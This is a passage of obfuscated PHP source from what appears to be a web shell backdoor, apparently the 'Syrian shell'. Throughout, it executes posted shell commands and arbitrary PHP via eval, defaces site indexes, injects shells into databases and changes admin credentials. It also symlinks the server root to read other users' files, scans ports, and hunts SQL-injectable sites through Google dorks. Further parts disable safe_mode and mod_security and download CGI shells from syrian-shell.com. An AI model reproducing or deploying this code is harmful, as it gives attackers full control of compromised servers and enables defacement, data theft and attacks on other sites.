<b\162>&nbs\160;&\156\142\163\x70;<a \x68\x72\x65\146='\150\x74\x74\x70://\x77\x77w.google.\x63\157m/\163\x65\141\162\143\150?\161=".urlencode(php_uname())."' target='_\x62\154a\x6ek'><\163y><\x75>".$uname." </\x75></\x73\171></a><b\x72>&\156\142s\x70;&n\x62s\160;".$dir."<br>&\156b\163p;&\156\x62\x73\160;".Exe('id')."</\142>
</f\157\156\164></\164\x64></\x74\x72></\x74\x62o\144\171>
</\164\141\x62\154\x65>
&nb\x73\x70;&nb\163p;[<a h\162\145\146='#d\x6f\x77\x6e'>\104o\x77\156</a>]
 [<a h\x72\x65f='\152a\166\x61s\143\x72\x69pt:w\151\x6edo\x77.\160\x72\x69\x6e\x74()'>\120\162\151n\164</a>]
</\x74a\x62\154\x65>";  
 
 
if ($_GET['id']== 'mainPage') { echo "<\x73\x63\162i\160\x74>\167in\x64\x6f\x77.\x6f\x6el\x6f\141d = \103\150a\156\x67\x65\x53Q\114\124\x79pe;</script>"; echo "<\x66o\162m method='\x50\117\x53\124'><\164\x61\142\x6c\145 bg\x63o\154or='#\x63\x63c\x63\x63\x63' \x63\145ll\x70\x61\x64\x64\151\156\x67='0' \143\145\154\x6cs\x70\x61\x63in\x67='0' \167i\x64\164\x68='100%'>
    <t\162><\164d \x63\x6flsp\141\156='2' a\x6c\151\x67\156='\143en\164\145r'>".$_POST['alias'].$_POST['cmd'] ."</\x74\144></\x74\162>
    <\164\162><td>
    <te\x78\164\141\x72e\141 name='\105\170\145\143\x75\x74i\x6f\x6eA\162\x65\x61' rows='20' c\x6f\x6c\163='152'>"; if(!$_POST || $_POST['login'])  
{chdir($_POST['directory']);iiIolll1o11oIOll($os);} else if($_POST['submitCommands'])  
{echo Exe($_POST['alias']);} else if($_POST['Execute'])  
{ chdir($_POST['directory']); if(empty($_POST['cmd'])){iiIolll1o11oIOll($os);} else if (strtolower(substr($_POST['cmd'],0,2)) == 'cd') {chdir(strtolower(substr($_POST['cmd'],3)));iiIolll1o11oIOll($os); } else { $exec = Exe($_POST['cmd']); if($exec){echo $exec;} else{iiIolll1o11oIOll($os);} } }  
 
 
else if($_POST['UpdateIndex']) { $hackingType = $_POST['hackingType']; $ScriptType = $_POST['ScriptType']; if($hackingType == 'indexChanger') { iIO0io1IO0OI1lii($_POST['HOST'],$_POST['USER'],$_POST['PASS'],$_POST['DB']); $index = stripslashes($_POST['INDEX']); $prefix = $_POST['PREFIX']; if($_POST['injectShell'] == 'yes') { $injectShellType = $_POST['InjectShellTypeSpan']; } ii10i1O10IIIOi11($ScriptType,$index,$prefix,$injectShellType); } else if($hackingType == 'changeInfo') { iIO0io1IO0OI1lii($_POST['HOST'],$_POST['USER'],$_POST['PASS'],$_POST['DB']); changeInfo($ScriptType,$_POST['adminID'],$_POST['userName'],$_POST['password']); } else if($hackingType == 'decrypt') {iioO1iiiOOoIi1l0($ScriptType);} }  
 
 
else if($_POST['submitEval'] && ($_POST['evalOrEnc'] == 'analyze')) { $hash = $_POST['php_eval']; $i1llioo0OO0llIo1 = substr($hash,0,3); if($i1llioo0OO0llIo1 =='$ap' && strlen($hash) == 37){echo "T\150e \110\141\x73\x68 : ".$hash." \151\x73 : MD5(A\120\122) \110\x61\x73\150";} else if($i1llioo0OO0llIo1 =='$1$' && strlen($hash) == 34){echo "\124h\x65 \110\x61\x73h : ".$hash." \x69\163 : M\x44\x35(U\116\111\130) \110\x61\x73\150";} else if($i1llioo0OO0llIo1 =='$H$' && strlen($hash) == 35){echo "\x54\x68\x65 \110ash : ".$hash." is : M\1045(\160\150\160\102\x42\063) \110a\163\150";} else if(strlen($hash) == 29){echo "\124\x68\x65 H\x61s\x68 : ".$hash." \151\163 : \115\x44\x35(W\157\x72dpr\x65s\x73) \x48a\163h";} else if($i1llioo0OO0llIo1 =='$5$' && strlen($hash) == 64){echo "\x54\x68\145 \110\x61sh : ".$hash." i\163 : \x53\x48\10125\066(\125\x4eIX) Ha\163h";} else if($i1llioo0OO0llIo1 =='$6$' && strlen($hash) == 128){echo "Th\x65 Has\x68 : ".$hash." \x69\163 : \123H\x41\x351\062(\x55\116\111\x58) \110as\150";} else if(strlen($hash) == 56){echo "T\x68\145 \x48\x61\x73\150 : ".$hash." is : \123HA2\062\x34 \x48\141\x73h";} else if(strlen($hash) == 64){echo "\124he \x48\141\163h : ".$hash." \151\163 : S\110\x41\x325\066 \x48\x61s\x68";} else if(strlen($hash) == 96){echo "\x54\x68\145 \110\141sh : ".$hash." \151s : S\x48A3\x38\x34 H\x61\x73h";} else if(strlen($hash) == 128){echo "\124\x68\145 Has\150 : ".$hash." i\x73 : S\110A5\061\062 \110\x61\163\x68";} else if(strlen($hash) == 40){echo "T\150\145 H\x61\x73\150 : ".$hash." \151s : \115\171\123\x51\x4c V\x35.3.\x78 \x48\141\x73\150";} else if(strlen($hash) == 16){echo "\124he \110\141\163\150 : ".$hash." \x69\x73 : \115y\x53Q\114 \110\141\x73\x68";} else if(strlen($hash) == 13){echo "\124\x68e Ha\163h : ".$hash." \x69\x73 : D\105S(\x55\x6ei\170) \110ash";} else if(strlen($hash) == 32){echo "\124\x68e \x48\141\163h : ".$hash." \x69\x73 : \x4d\x44\x35 Ha\163\150";} else if(strlen($hash) == 4){echo "T\150e \110\x61\x73\x68 : ".$hash." \x69s : [C\x52\103-16]-[\x43RC-16-\x43\103\x49T\x54]-[\x46\103\x53-16]";} else {echo "\105\x72\162\157r : \103\141\156'\x74 \x44\x65\164e\x63\x74 \110a\163\150 T\x79\x70\145";} }  
 
 
else if($_POST['submitEval'] && ($_POST['evalOrEnc'] == 'eval')) { $eval = str_replace("<?\x70h\x70","",$_POST['php_eval']); $eval = str_replace("<?\160h\160","",$eval); $eval = str_replace("?>","",$eval); $eval = str_replace("\\","",$eval); eval($eval); }  
 
 
else if($_POST['submitEval'] && ($_POST['evalOrEnc'] == 'enc')) { if(!empty($_POST['php_eval'])) { $i0oll011iiiI0oi1 = $_POST['php_eval']; for ($i=0;$i<strlen($i0oll011iiiI0oi1);$i++) {$iI00i1oolIoOOo11 .= strtoupper(dechex(ord($i0oll011iiiI0oi1[$i])));} for ($i=0;$i<strlen($i0oll011iiiI0oi1);$i+=2) {$i00iiOO00Io1liii .= chr(hexdec($i0oll011iiiI0oi1[$i].$i0oll011iiiI0oi1[$i+1]));} $iO0il1oOOIl0O111 = 'CHAR('; for ($i=0;$i<strlen($i0oll011iiiI0oi1); $i++) {$iO0il1oOOIl0O111 .= ord($i0oll011iiiI0oi1[$i]).(($i<(strlen($i0oll011iiiI0oi1)-1))?',':')');} $iii11lOOIiI1OO0l='CHAR('; for ($i=0;$i<strlen($i0oll011iiiI0oi1); $i++) {$iii11lOOIiI1OO0l .= ord($i0oll011iiiI0oi1[$i]).(($i<(strlen($i0oll011iiiI0oi1)-1))?',':')');} echo "
\x4dD\x35             : ".md5($i0oll011iiiI0oi1)."
\102\141\x73\14564 \x45\x6eco\x64\x65       : ".base64_encode($i0oll011iiiI0oi1)."
\x42\x61\x73\145\066\x34 \x44\145c\x6fd\145       : ".base64_decode($i0oll011iiiI0oi1)."
\103\x72\171\x70t             : ".crypt($i0oll011iiiI0oi1)."
\123HA1             : ".sha1($i0oll011iiiI0oi1)."
\x4dD4             : ".hash("\155\x64\064",$i0oll011iiiI0oi1)."
\x53\x48A\x32\x35\066             : ".hash("\163\150a2\065\066",$i0oll011iiiI0oi1)."
\125\122\x4c E\x6e\x63od\151\x6e\147         : ".urlencode($i0oll011iiiI0oi1)."
\x55\x52\x4c \104\145\x63o\144i\156\x67         : ".iIl1l0O0ooOO1IOI($i0oll011iiiI0oi1)."
\103\122\103\x33\062             : ".crc32($i0oll011iiiI0oi1)."
L\145\x6e\147\x74\150             : ".strlen($i0oll011iiiI0oi1)."
2\x48E\130                    : 0x".$iI00i1oolIoOOo11."
\x48e\x78\x32             : ".$i00iiOO00Io1liii."
2\x44EC             : ".$iO0il1oOOIl0O111."
\104E\x43\062            : ".$iii11lOOIiI1OO0l.""; } else{echo "P\154\145\141\x73\x65 P\165\x74 \101t \114\145a\x73\164 \x4f\x6e\145 \x43\x68\141r !";} }  
 
 
else if($_POST['submitEval'] && ($_POST['evalOrEnc'] == 'genServ')) { chdir(stripslashes($_POST['php_eval'])); mkdir("\x61\154\x6c\163e\x72\166\x65r", 0755); chdir("\x61l\x6cs\145r\166\x65\162"); Exe("\x6c\156 -s / \x61\x6cl\163\x65\162\166\x65r"); iii0li0iIOii1III(".htaccess","
    \x4f\160\164i\x6f\x6es I\x6e\144e\170\145\163 \106\157\154\x6c\157\167S\171\155\x4c\x69n\x6b\163
    D\151\162\145c\164\157ry\x49n\144\145\x78 s\x73s\163\x73\163.h\x74\155
    A\144\144\124\x79\160e \164\x78\x74 .\160\150p
    \101\144\x64\110\141\156\144\x6ce\162 \x74x\164 .p\150\x70"); echo 'Now Go to allserver folder '.getcwd().'' ; }  
 
 
else if($_POST['submitEval'] && ($_POST['evalOrEnc'] == 'scan')) { $iooIl0li000Iooli = $_POST['php_eval']; if(!$iooIl0li000Iooli){echo "[-] \105n\x74\145r \111\x50 Address O\x72 \104\x6f\x6d\x61\x69\x6e To Sc\x61\156";} else { for($i=0;$i<1024;$i++) { $i10Oi1lOO10I1OoI = fsockopen($iooIl0li000Iooli,$i,$il1Oi1OoO11I1OiI,$i1Oli10olOiIlloI,10); if($i10Oi1lOO10I1OoI){echo "[+] port " . $i . " open \157\156 " . $iooIl0li000Iooli . "
";} flush(); } fclose($i10Oi1lOO10I1OoI); } }  
 
 
else if($_POST['submitEval'] && ($_POST['evalOrEnc'] == 'sqlScanner')) { set_time_limit(0); ignore_user_abort(true); ini_set('memory_limit', '128M'); $google = "\150\164\x74p://\x77\x77\x77.google.\x63\x6fm/\x63s\145?cx=013269018370076798483%3\101\167d\142\x61\063\144lnxqm&\161=\x52E\120\x4cA\103\105_\104\x4fR\x4b&\156\x75m=100&hl=e\x6e&a\163_qd\162=al\x6c&start=\122EP\x4c\101\x43\x45_STA\122\124&s\x61=\x4e"; $i = 0; $a = 0; $b = 0; while($b <= 900) { $a = 0; echo " D\157r\x6b: [ ".$_POST['dork']."]\n"; ob_flush();flush();sleep(1); if(preg_match("/di\144 \x6e\157t \x6dat\143\x68 a\x6e\171 \144\x6f\x63\165me\156t\x73/", i1iOiooI011Ioo0o(str_replace(array("\122\105\x50\114\x41\x43\105_D\117\x52K", "R\x45\120\x4c\101\x43\105_\x53\124\x41\122\124"), array("".$_POST['dork']."", "$b"), $google)), $iIio1oOolli0oI1l)) { echo "\x53e\145 so\x6d\145t\x68\151n\147 \142ut \156o\x74 \146\157\165\x6e\144??"; ob_flush();flush();sleep(1); break; } preg_match_all("/<\1502 \143\x6c\141\163s=(.*?)><a \x68\x72\145\x66=\"(.*?)\" \x63\x6c\141\163\163=(.*?)>/", i1iOiooI011Ioo0o(str_replace(array("R\105\x50\x4c\x41CE_\104O\122\113", "R\x45P\114\101C\x45_ST\101RT"), array("".$_POST['dork']."", "$b"), $google)), $sites); echo "R\145s\x75\x6c\x74 of \x69\156\152\x65\x63ti\157\x6e...\n"; ob_flush();flush();sleep(1); while(1) { ob_flush();flush();sleep(1); if(preg_match("/\x59o\165 h\x61\x76\x65 an e\x72ror \x69\156 \171\x6f\x75\x72 \123Q\x4c|Div\x69\x73\x69o\x6e b\171 \172\145r\157 \x69\x6e|s\x75\160\x70\x6c\151\x65\x64 \x61\162g\165\155ent i\x73 \156\157\164 a v\x61li\x64 M\171SQL result \x72\x65\163o\x75\162\x63e \x69\x6e|C\x61l\154 to a \155\x65\x6dbe\162 \146\165n\x63\x74\x69o\156|\x4di\x63r\157\163\x6f\x66t J\x45\x54 Dat\141\142\x61se|O\x44\102\x43 \x4d\151\x63r\157\x73\x6f\146\164 \101\143\143\145\x73\163 \x44r\151v\145r|\115icr\157s\x6f\x66t OLE \104B \120r\x6fvi\x64er \146o\x72 S\121\114 S\145\x72\166\x65r|\125\156cl\x6fse\144 \161\165\x6f\164\x61\164io\x6e \x6d\x61\x72\x6b|M\x69\x63\x72\157\163\157\146\164 O\114\x45 D\x42 \120\162o\x76i\144\145\162 f\x6fr Oracle|\111\x6e\143\x6frrec\164 \x73\171\x6e\x74a\170 n\x65\141\x72|SQL query \x66\141\x69l\145d/", i1iOiooI011Ioo0o(str_replace("=", "='", $sites[2][$a])))) { echo str_replace("=", "='", $sites[2][$a])." <== \131e\x61\x68..\126\x75ln\145\x72\141\x62le ! \n"; } else { echo str_replace("=", "='", $sites[2][$a])." <== \116\157\164 \126ul\x6e\145r\141\142le..\x73\x6fr\x72y! \n"; ob_flush();flush();sleep(1); } if($a > count($sites[2])-2){echo "\x4cet\163..s\143\141\156 o\164\x68\x65\162 p\141\147\145.. \n";break;} $a = $a+1; } $b = $b+100; } }  
 
 
else if($_POST['doAction'] && ($_POST['someAction'] == 'showUsers')) {showUsers();}  
 
 
else if ($_POST['helpCommands']) { echo "
|--------------------------------------------|----------------------------------------------------|---------------------------------------------|
|                  C\x6f\155ma\156\x64                   |                       Ex\141\155\x70l\145                      |                     \x43\x6f\155\x6d\145\156t                 |
|--------------------------------------------|----------------------------------------------------|---------------------------------------------|
|                  zip                       |          zip F\x69\154\x65N\141m\x65                              | C\157\x6dpre\x73\x73 t\150\145 \106i\x6ce\163 \x49n\164\x6f a ZI\120 A\x72c\x68\151\166\x65       |
|                  u\x6e\x7a\x69\x70                     |          u\x6e\x7a\x69\160 \x46i\154\145\116\x61\x6d\x65                            | \x45\x78\164ra\143\164 \x74\150\145 Z\x49P \101r\x63\150\x69v\145s                    |
|                  \164\x61\162 -z\x63\x66                  |          t\141\162 -z\x63\146 zz.\164a\162 d\141\151\154\x79                     | \x43\157\x6dpr\x65s\x73 \164h\x65 F\x69\154\145\163 In\164o a \x54\101R \101\x72c\150\x69\x76e       |
|                  t\141r -z\x78\146                  |          \x74\x61\x72 -\x7a\170f z\x7a.\x74\x61r                           | Ex\x74\x72ac\164 \x74\x68\x65 \x54A\122 \101rc\150iv\145s                    |
|                  \x74\141\162 -\143\172v\x66                 |          \164\x61r -\143\172\x76\146 F\x69leN\141me.\x74\141\x72.g\172 F\x69le\x4e\x61\155\x65        | \103\157mp\162es\x73 \164h\145 \106il\x65s \x49n\x74\x6f a \x47\x5a  A\162\143\150\x69v\x65       |
|                  gzip -d                   |          gzip -d Fi\x6c\x65\116am\145.g\x7a                       | \105\170\164r\x61\143t \x74\x68\x65 \107\132 Ar\x63\150\151\166e\x73                     |
|                  \x74\141\x72 -\x63\172\166\x66                 |          \164\141\x72 -c\172\166\146 \106i\154\145\x4e\141m\x65.\x74a\162.\x67\x7a \x64ata\142\x61\x73\145.sql    | C\x6fmp\162e\163\163 \x74\150\x65 File\x73 \111n\x74\x6f \123\121L A\162\x63\150i\x76\x65         |
|                  \164a\x72 -zxv\146                 |          \x74\x61\x72 -\172\x78\x76\x66 F\x69\x6c\x65Na\155\x65.\164\141r.\x67\172                 | E\x78\x74r\x61\143t \x74h\145 \x44\x61\x74\141ba\163\145 \x46\x69\x6c\x65\163 S\x51\114              |
|                  t\x61\x72 -\x63\172\x76\x66                 |          tar -c\x7av\x66 \x46il\145\x4e\x61\155\145.\x74ar.g\x7a Ne\167\x46i\x6ce\116a\155\145     | \103\157\x6d\160\162\145\x73\x73 t\150\145 F\157\x6c\x64er\163 \111\x6et\157 a t\141\162.\147\172 \101\162ch\151\x76e  |
|                  \x6c\163                        |          ls /h\157m\x65                                  | Vi\145\167 \164\150e \146\151les name in \x74\x68\145 directory        |
|                  \154\163 -\x6c\x61                    |          ls -\x6c\x61 /\x68\x6f\155\145                              | \126i\145\x77 \x46\x69\154\x65\x73 \101\156\144 Fold\145\x72s \x69\156 h\x69d\x64en \146\x69\x6c\145s      |
|                  \160wd                       |          p\167d                                       | \123\x68ow \164\x68e \103\165r\162e\x6et \x50a\164\150                       |
|                   ;                        |          \x6c\x73;\160\x77\x64                                    | \103\157m\x62i\x6e\145 th\145 \x43o\155ma\x6e\x64s                        |
|                  \167get                      |          \x77get \x68\x74\x74\x70://site.\x63\157\155/\x66i\x6c\145.zip             | Get \x66i\154\x65 \146\162om U\x52L \x55\x73\x69\156\x67 \127\147e\164 C\x6fmm\x61\156\144        |
|                  curl -o                   |          curl -\157 h\164\x74\160://site.\143\157\155/f\151\154e.zip          | \x47e\164 \x66\151\x6c\145 \x66\162\157\155 \x55\x52L U\163\151n\x67 curl -\x6f \103o\155\155\141\x6e\x64     |
|                  \x6c\171\156x -\163\x6f\x75rce              |          lynx -s\157u\162c\145 \150\164tp://site.com/\x66i\x6ce.zip     | \107et f\151\154\x65 \146\162\x6f\x6d URL U\x73ing l\171\156\170 -so\x75\x72\x63e \103\157\155\155\141\x6e\x64|
|                  \x67e\x74                       |          \147\x65\x74 \150\164t\x70://site.\x63\157m/f\x69\154\x65.zip              | \x47\x65t \146\x69\154\x65 \146\162o\x6d U\122\x4c \125\x73\151\156\147 \x67\x65t \x43\157\155\155\141n\x64         |
|                  \x68i\163\x74\x6f\162\171                   |          \150isto\x72y                                   | S\150\157\167 A\154\154 Pre\166\x69\x6fu\163 \103\x6fm\x6da\x6e\144\x73 \x74\x68\141\164 y\157\x75 \x45\170e\143\165t\x65d|
|                  \x6d\153d\151r                     |          \155\x6bdi\162 /m\x79\x4ee\x77D\151\162                           | \155\x61k\145 a \x6ee\167 D\151\x72\145c\164\x6f\162\171 \x69\156 t\x68e server          |
|                  \x72m                        |          rm \146\x69l\x65                                   | \x44e\154e\164\151\156\x67 F\x69\x6c\x65\163                              |
|                  \x72m -\162                     |          \162m -r \155\171D\x69\x72e\x63\164o\162\x79                         | \x44\x65\154\145t\x69\156g D\x69\162\x65\x63t\x6fr\171 \141\x6e\144 it's F\x69\x6c\x65s           |
|                  e\144\151\164                      |          \145\x64i\164 m\x79\106\x69\x6c\145                               | E\x64\x69\164 a \x66\x69\154\x65 \165\x73\151\156\147 text \145di\x74\145r               |
|                  \x77\x68\157                       |          w\150\157                                       | \x77\150\x6f's \x43\x6f\156\156\145c\164\x65\x64 to t\x68\145 server               |
|                  \x63\144                        |          \x63\144 /\x68\157\155\145/user                             | \x45\156\164e\162 \164he \123\145\x6c\x65\143\164\x65\144 P\141th                     |
|                  \x63\x64 ../                    |          \143\144 ../                                    | \x47\x6f \124\x6f U\160\x70\145\x72 \x44\x69\162\x65\143to\x72\x79                       |
|                  \x6dv                        |          \155\166 \155\x79\106\151\x6ce1 /\x68\157\155\x65/\155\171\106\x69l\145\062                  | M\157ve \x41nd Re\156\141\155e Th\145 F\x69\154\x65                    |
|                  f\x69\x6e\x64                      |          f\x69\x6e\x64 \155\171\106\x69l\x65                               | \x4co\x6f\x6b\151\x6eg f\157\x72 a f\151\x6ce \x6f\x72 \146o\x6cde\162                |
|                  ./                        |          ./l\x6f\x63\141l\x72\x6fot                               | \x45x\x65\143\x75t\x65 the \105\170\145\x63\165t\x61\x62\154\x65 \146\x69\154e                 |
|                  \x73\x68                        |          \x73h loc\x61\x6cro\x6ft                              | E\170\145\x63u\164\x65 \x74he shell \120\162\157\x67\162a\x6d\155\x69\156\x67 C\x6fd\x65          |
|                  uname -a                  |          uname -a                                  | \126i\145\167 T\150e S\145\162ve\162 \x4b\145r\x6ee\x6c In\146o\162\x6d\x61\164\151o\x6e          |
|                  *                         |          rm *                                      | \105x\x65cute \x74he C\157m\155\141\156d \x66o\x72 al\154                 |
|                  \155\141n                       |          \155\141\156 \x6c\x73                                    | H\145\154\160 About \x6cs \103\x6f\x6d\x6da\156\144                       |
|                  \164ou\x63\150                     |          \x74o\165\x63\150 \x6dyFi\154\145                              | \x43\x72\145\141t\x65 \101 \156e\167 F\151\154\145                           |
|                  \x67\x63c                       |          \147\x63c \x6d\171\x46\151\154\x651 -\x6f my\106\151\x6ce2                    | \x43\157n\x76\x65\x72\164 to \102i\156\x61ry E\170\x65\143ut\x61\142le \106\151\x6ce           |
|                  \x63at                       |          \143\x61\164 \x6dy\x46\x69\x6c\145                                | \x52\145\141\144 th\145 F\x69\x6c\145 c\157\x6et\145\x6e\164s                      |
|                  \155\x6f\162e                      |          m\157\162\145 \155\x79\106\151le                               | \x52\145\x61\144 \x74\x68e File \145\141si\x6cy \x69\146 \x69\x74's \x6c\141r\147           |
|                  \160i\143o                      |          \x70\x69\x63\x6f \x6d\171F\151\x6ce                               | \x45\x64\151\x74 \106\x69\154\x65 U\163\151\156g \120\151\143o \x54\145\x78t \105d\x69\164\x65r            |
|                  perl                      |          P\145r\154 m\x79F\x69\154e.\x70\x6c                            | \x45x\x65\143\x75\x74e \x74\150e Pe\162\154 \x53c\162\x69\160t\x73                    |
|                  \154\156                        |          \154\156 -s /\x68o\155\145/my\106\x69l\x65 \155\x79\114i\x6e\x6b                 | M\x61k\x65 a lin\x6b to t\x68e \x66\151\x6ce                     |
|                  g\162\x65\x70                      |          g\162\x65\160 \x6dy\106\x69\154e \x6dy\x54\x65\x78t                        | \x4coo\153 \x66\x6fr \164\x68\x65 Te\x78\x74 \151\x6e the \106i\154\x65               |
|                  \x63\x68\155\x6f\x64                     |          c\x68m\x6f\144 755 my\x44\151\x72ec\164o\162\x79                     | C\x68\x61\x6e\147\145 \x74\x68\x65 p\x65\162\155\x69\163s\151\157\156 to \x46\151l\x65s O\x72 \106o\x6cd\x65\162s   |
|                  \143\150o\167n                     |          \143\150o\x77n r\x6f\157\164 m\x79F\x69\154\x65                         | \x43\x68\x61\156\147e t\150e \x46\151\x6c\x65 O\167\x6ee\x72                       |
|                  \143\x68\147r\160                     |          \143\x68gr\x70 \162o\157\x74 \155\171\106i\154\x65                         | C\150\x61\156g\x65 \x54\x68\145 \x46\x69\154\145 \x47\x72\x6fu\x70                       |
|                  \x63l\145a\162                     |          \x63\x6c\x65\x61\162                                     | C\154\x65\x61\x72 \x74\150\145 \x53\143\162\145\x65\x6e                            |
|                  \143\x6d\160                       |          cm\160 \x6dy\106\x69\154\145\061 my\x46\x69\x6c\1452                       | \103\x6f\x6dp\x61r\x65 \x74h\145 \124\157\x77 \106i\154\145\x73                       |
|                  \x63ry\x70\x74                     |          c\x72y\x70t \x6d\x79Fi\154e                              | \124o \105ncr\171\x70\164 \x6d\171F\x69\154\x65                           |
|                  \143\x73\x70l\151\164                    |          \x63s\160\154\151t \155\x79\x46\x69\154\x65                             | \x53\x70\x72\x65\141\144 \164\x68\145 Fi\154\x65 \111nt\x6f \x70\151ec\x65\x73                 |
|--------------------------------------------|----------------------------------------------------|---------------------------------------------|
"; }  
 
 
else if($_POST['generatePel']) { chdir($_POST['cgiperlPath']); mkdir('cgi', 0755); chdir('cgi'); iloOl1lloloI1loI('http://www.syrian-shell.com/cgi/compiler.zip'); UnZip('compiler.zip',getcwd()); DeleteFile('compiler.zip'); iI11i0Il0iO0iooi("compiler",0777); if($_POST['cgiType'] == "\143\147i\x50e\162\154") { iloOl1lloloI1loI('http://www.syrian-shell.com/cgi/cgiPerl.zip'); UnZip('cgiPerl.zip',getcwd()); DeleteFile('cgiPerl.zip'); iI11i0Il0iO0iooi("\143g\151\x50\145r\154.\x73y\063",0755); echo '
Go To Link : cgi/cgiPerl.sy3
Password Is : sy3' ; } else if($_POST['cgiType'] == "\143\x67\x69P\x61\x79\164ho\156") { iloOl1lloloI1loI('http://www.syrian-shell.com/cgi/cgiPaython.zip'); UnZip('cgiPaython.zip',getcwd()); DeleteFile('cgiPaython.zip'); iI11i0Il0iO0iooi("\x63\x67\151\120\141y\x74\x68\x6fn.s\171\x33",0755); echo '
Go To Link : cgi/cgiPaython.sy3
'; } else if ($_POST['cgiType'] == "c\x67i\125s\x65r\163") { iloOl1lloloI1loI('http://www.syrian-shell.com/cgi/users.zip'); UnZip('users.zip',getcwd()); DeleteFile('users.zip'); iI11i0Il0iO0iooi("u\163er\x73.sy\x33",0755); echo '
Go To Link : cgi/users.sy3
'; } iii0li0iIOii1III('.htaccess','AddHandler cgi-script .sy3'); }  
 
 
else if($_POST['changePermission']) { if($os == 'Windows'){echo "[-] \x4eo \120er\155\x69\x73\x73i\x6f\x6es \x69\156 Windows \117\123.";} else { $ilII1o111lIlIlIo = iI11i0Il0iO0iooi($_POST['fileName'],$_POST['per']); if($ilII1o111lIlIlIo){echo "[+] \x50\145\x72\x6d\x69\x73\163\x69o\x6e \x43\150\141ng\145d S\x75c\143\145\163\163f\x75l\154\171 ! " ;} else{ echo "[-] C\x68a\156gi\x6e\147 \x49\x73 No\x74 \x41\154\154o\x77\x65\x64 \117r \x54he Fi\154\145 \151\163 \x6e\x6f\x74 \x45x\151\163\164 !";} } }  
 
 
else if($_POST['generateForbidden']) { chdir($_POST['forbiddenPath']); mkdir('forbidden'); chdir('forbidden'); $htaccess = fopen('.htaccess','w+'); if($_POST['403'] == 'DirectoryIndex'){fwrite($htaccess,"\104\x69r\x65c\164\x6f\x72\171\x49\x6e\x64ex \151n.\164x\164");} elseif($_POST['403'] == 'HeaderName'){fwrite($htaccess,"\110\x65\x61\x64\x65rN\141\155e \151\156.\164\x78t");} elseif($_POST['403'] == 'TXT') { fwrite($htaccess,"
        O\160t\151\157\156s \111n\x64\145\x78\145s F\157ll\157w\x53\171\155\x4c\x69\x6e\x6b\163 
        a\144d\124y\x70e t\170t .\160hp 
        \x41d\144\110\x61\x6e\144le\162 tx\x74 .\160h\x70"); } elseif($_POST['403'] == '404') { fwrite($htaccess,"
        \x45\162\x72\157\x72\104oc\165m\x65\156\x74 404 /404.ht\x6dl 
        404.\x68t\155l = \x53\171\155\x6cin\x6bed i\x6e.\164\x78\x74  "); } elseif($_POST['403'] == 'ReadmeName'){fwrite($htaccess,"Re\x61\144m\x65\116a\155\x65 \x69n.t\x78\164");} elseif($_POST['403'] == 'footerName'){fwrite($htaccess,"\146o\157t\x65r\116\141\155\145 \151\x6e.t\170t");} echo "
\116\x6f\167 G\x6f To [ \x66\157\162\142i\x64\x64\x65\156 ] D\151\x72 \101n\x64 T\x68e\x6e m\x61k\x65 \124he \123\x68\157rt\x63\x75t [ in.txt ]
E\x58 : \154\156 -s /h\157me/user/\160\x75\142li\x63_h\x74\155l/config.\160h\160 \x69\x6e.\x74xt"; }  
 
 
else if($_POST['UploadNow']) { $uploadingDir = $_POST['uploadingDir']; $uploadingDir = str_replace("\\\\","\\",$uploadingDir); $uploadingDir = str_replace("//","/",$uploadingDir); chdir($uploadingDir); $iOOIiiO0lOooIoOi =0; $iIliilO1l0lIio0I = array(); $path= ''; $i1o1iOooOlooOIi1= $path . basename($_FILES['uploadfile']['name'][$i]); for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) { if($_FILES['uploadfile']['name'][$i] != '') { move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $i1o1iOooOlooOIi1 . $_FILES['uploadfile']['name'][$i]); $iIliilO1l0lIio0I[] = $_FILES['uploadfile']['name'][$i]; $iOOIiiO0lOooIoOi++; echo "\124\x68\x65 \x46\151\x6ce  ".basename($_FILES['uploadfile']['name'][$i])." U\160\154oa\x64\145d S\165\143\143\x65\x73sf\x75\154ly !
"; } else "T\150e \106\151\x6ce  ".basename($_FILES['uploadfile']['name'][$i])."  C\141\x6e'\164 \102e \x55p\x6c\x6f\141d :( !"; } }  
 
 
else if($_POST['doAction'] && ($_POST['someAction'] == 'genPhp')) { $iOIOi1l01liIIol1 = iii0li0iIOii1III("p\150p.\x69n\x69","
    safe_mode = \117f\x66
    \144\151\163\141\142\154\x65_\x66\x75\x6e\143t\151\x6f\156s = \x4e\117\116\x45
    s\x61\146\145_\x6do\x64\145_g\151\144 = \117\x46\106
    \157\x70e\x6e_\x62\x61s\145\x64i\x72 = \x4f\x46F"); echo "\160\150\160.ini H\x61\x73 \x42\145\x65\x6e G\145\x6e\145\x72\x61\164\145d \x53u\x63c\x65\x73\x73\146\x75\x6c\x6cy"; if($iOIOi1l01liIIol1){echo "[+] \160\x68\160.\151\156\x69 Has Bee\156 G\145\x6e\145ra\x74ed \x53u\143\143\145\163sf\x75\x6cly ";} else {echo "[-] \x46\x61\151\154\145d to \x67e\x6e\x65\x72\141t\x65 \160h\x70.i\x6ei fi\x6c\x65 !! ";} } else if($_POST['doAction'] && ($_POST['someAction'] == 'genHtaccess')) { $iOIOi1l01liIIol1 = iii0li0iIOii1III(".htaccess","
    <If\x4d\157d\x75\154e m\157d_s\x65\x63\165r\x69\x74\x79.c>
    \x53e\143\x46\151l\x74e\x72E\x6e\x67\151n\x65 \x4ff\x66
    \x53e\x63Fi\154te\162S\x63\x61nPO\x53\124 \117ff
    \123ecF\x69\154\164\x65rCh\x65\x63kU\x52\114\105\156c\157\x64\151\x6eg \117\146\x66
    S\x65\x63\x46\x69l\164\145r\103\x68ec\153\x43\x6fo\153\x69\x65\x46\157\162ma\x74 \117\146f
    SecFi\154\164e\162\x43hec\153\x55\x6e\x69c\157d\x65E\156co\144\x69\156g \x4f\146f
    S\145\143\106\151l\164\x65\162\116\157\x72\155\x61\154i\172\145C\157o\x6b\151e\x73 \x4f\x66\x66
    </\x49\x66M\157\144u\154e>
    \x53\145tEn\166 \x50H\x50\122\103 ".getcwd()."/\x70\150\160.\151\x6ei
    s\x75PH\x50_C\157nf\151\147\x50\x61th ".getcwd()."/\160\150p.\151\156i
    "); if($iOIOi1l01liIIol1){echo "[+] .htaccess \110\141\x73 \102\x65\x65\x6e G\145\x6ee\x72ated S\x75\143\143e\163\x73\x66\x75\154\154\x79 ";} else {echo "[-] \106\141\x69\154\x65\x64 to \x67\145\156\x65r\141\x74\145 .htaccess fi\154\x65 !! ";} } else if($_POST['doAction'] && ($_POST['someAction'] == 'genINI')) { $iOIOi1l01liIIol1 = iii0li0iIOii1III("\151\x6e\151.\160\x68p",'
